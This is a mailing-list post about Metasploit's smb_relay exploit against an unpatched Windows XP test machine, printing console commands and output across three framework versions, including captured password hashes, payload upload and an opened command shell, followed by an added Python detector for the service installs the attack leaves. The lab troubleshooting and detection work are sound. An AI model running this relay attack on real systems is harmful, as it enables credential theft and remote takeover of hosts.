Metasploit mailing list archives
smbrelay: framework 3.1 more reliable than 3.2 and 3.3?
From: m.iodice at gmail.com (Mirko Iodice)
Date: Tue, 2 Dec 2008 10:26:46 +0100
Recently I tested the smbrelay attack from 3 different versions of Metasploit against an unpatched (ms08-068) Windows XP Pro SP2 (VMware test machine). I got the same strange results running the attack from two different Linux boxes: one is my Ubuntu Intrepid Ibex and the other is a Backtrack 3 virtual machine. Below you can find the results; only Metasploit Framework 3.1 always works... can someone explain what's happening? Thank you.

---

msf v3.3-dev rev. 5990 vs unpatched (ms08-068) XP Pro SP2

msf > use windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
msf exploit(smb_relay) >
[*] Started bind handler
[*] Server started.
[*] Received 192.168.109.128:1129 TESTDOMAIN\Administrator LMHASH:7a82adf17f0d0d797eea14a99f17a00883c8db54aebfece8 NTHASH:8a2ffa5bd93d8a445f7b403d905c78b36909948a81e4b2ba OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.109.128 as TESTDOMAIN\Administrator...
[*] AUTHENTICATED as TESTDOMAIN\Administrator...
[*] Connecting to the ADMIN$ share...
[*] Regenerating the payload...
[*] Started bind handler
[*] Uploading payload...
[*] Created \QUmlMAKy.exe...
[*] Connecting to the Service Control Manager...

It gets stuck here and nothing happens...

---

msf v3.2-release vs unpatched (ms08-068) XP Pro SP2

msf > use windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
msf exploit(smb_relay) >
[*] Started bind handler
[*] Server started.
[*] Received 192.168.109.128:1145 TESTDOMAIN\Administrator LMHASH:b1af5fb25aedf0a866e0c894fc7245c120a901b7811ecdc9 NTHASH:c72f5d912ab3429c187391217d7c17888fe0dbd2dc84a228 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.109.128 as TESTDOMAIN\Administrator...
[*] AUTHENTICATED as TESTDOMAIN\Administrator...
[*] Connecting to the ADMIN$ share...
[*] Regenerating the payload...
[*] Started bind handler
[*] Uploading payload...
[*] Created \fcRkDlSK.exe...
[*] Connecting to the Service Control Manager...

It gets stuck here and nothing happens...

---

msf v3.1-release vs unpatched (ms08-068) XP Pro SP2

msf > use windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(smb_relay) > exploit
[*] Server started.
msf exploit(smb_relay) >
[*] Received 192.168.109.128:1181 TESTDOMAIN\Administrator LMHASH:b28812aaf57e770414a8f6d52eae10f907b2c4479b63f0b5 NTHASH:20b10932651da64ea42a2f0a6aaea0e59f7aba4d9bda6fa3 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.109.128 as TESTDOMAIN\Administrator...
[*] AUTHENTICATED as TESTDOMAIN\Administrator...
[*] Connecting to the ADMIN$ share...
[*] Regenerating the payload...
[*] Started bind handler
[*] Uploading payload...
[*] Created \DIfcbGwH.exe...
[*] Connecting to the Service Control Manager...
[*] Obtaining a service manager handle...
[*] Creating a new service...
[*] Closing service handle...
[*] Opening service...
[*] You *MUST* manually remove the service: 192.168.109.128 (DyHcMKdL - "MrXgHSxGCUuHbsLgpIFNQmAd")
[*] You *MUST* manually delete the service file: 192.168.109.128 %SYSTEMROOT%\DIfcbGwH.exe
[*] Starting the service...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.109.1:44105 -> 192.168.109.128:4444)

It works!

---
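The successful 3.1 run above shows exactly what the relay leaves on the host: a service with a random 8-letter name and a random display name, backed by an 8-letter .exe dropped straight into %SYSTEMROOT%. The following is an added detection example (not from the post or from Metasploit) that scores records shaped like Windows System log Event ID 7045 ("service installed") against those traits; the record fields and the three sample records are constructed, the first one mirroring the artifacts reported in the session.

```python
import re
from typing import Dict, List

# Constructed records in the shape of Event ID 7045 (service installed).
# The first copies the service name, display name and file path the
# smb_relay run reports; the other two are benign installs for contrast.
SAMPLE_7045: List[Dict[str, str]] = [
    {"service_name": "DyHcMKdL", "display_name": "MrXgHSxGCUuHbsLgpIFNQmAd",
     "image_path": r"%SYSTEMROOT%\DIfcbGwH.exe", "account": "LocalSystem"},
    {"service_name": "BackupAgent", "display_name": "Constructed Backup Agent",
     "image_path": r"C:\Program Files\Backup\agent.exe", "account": "LocalSystem"},
    {"service_name": "Spooler", "display_name": "Print Spooler",
     "image_path": r"%SystemRoot%\system32\spoolsv.exe", "account": "LocalSystem"},
]

# Traits taken from the console output: an 8-letter mixed-case service name,
# a long display name without spaces, and an 8-letter .exe placed directly in
# the system root instead of under system32 or a program directory.
RANDOM_NAME = re.compile(r"^[A-Za-z]{8}$")
ROOT_DROPPER = re.compile(r"^(?:%SYSTEMROOT%|C:\\WINDOWS)\\[A-Za-z]{8}\.exe$",
                          re.IGNORECASE)


def relay_indicators(rec: Dict[str, str]) -> List[str]:
    """Return the reasons a 7045-style record resembles an smb_relay service install."""
    reasons = []
    if RANDOM_NAME.match(rec["service_name"]):
        reasons.append("random 8-letter service name")
    display = rec["display_name"]
    if len(display) >= 16 and " " not in display:
        reasons.append("long space-free display name")
    if ROOT_DROPPER.match(rec["image_path"]):
        reasons.append("8-letter exe dropped in system root")
    return reasons


def flag_relay_installs(records: List[Dict[str, str]],
                        min_hits: int = 2) -> List[Dict[str, object]]:
    """Flag records meeting at least min_hits indicators, so one odd trait alone is not an alert."""
    flagged = []
    for rec in records:
        reasons = relay_indicators(rec)
        if len(reasons) >= min_hits:
            flagged.append({"service": rec["service_name"],
                            "path": rec["image_path"], "reasons": reasons})
    return flagged


if __name__ == "__main__":
    for hit in flag_relay_installs(SAMPLE_7045):
        print(hit)
```

The same two-of-three rule applies to the aborted 3.2 and 3.3 runs: the upload of \QUmlMAKy.exe and \fcRkDlSK.exe to ADMIN$ still happened even though no service was created, so a file-creation watch on the system root is the complementary signal.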
Current thread:
- smbrelay: framework 3.1 more reliable than 3.2 and 3.3? Mirko Iodice (Dec 02)
- smbrelay: framework 3.1 more reliable than 3.2 and 3.3? Nicolas RUFF (Dec 02)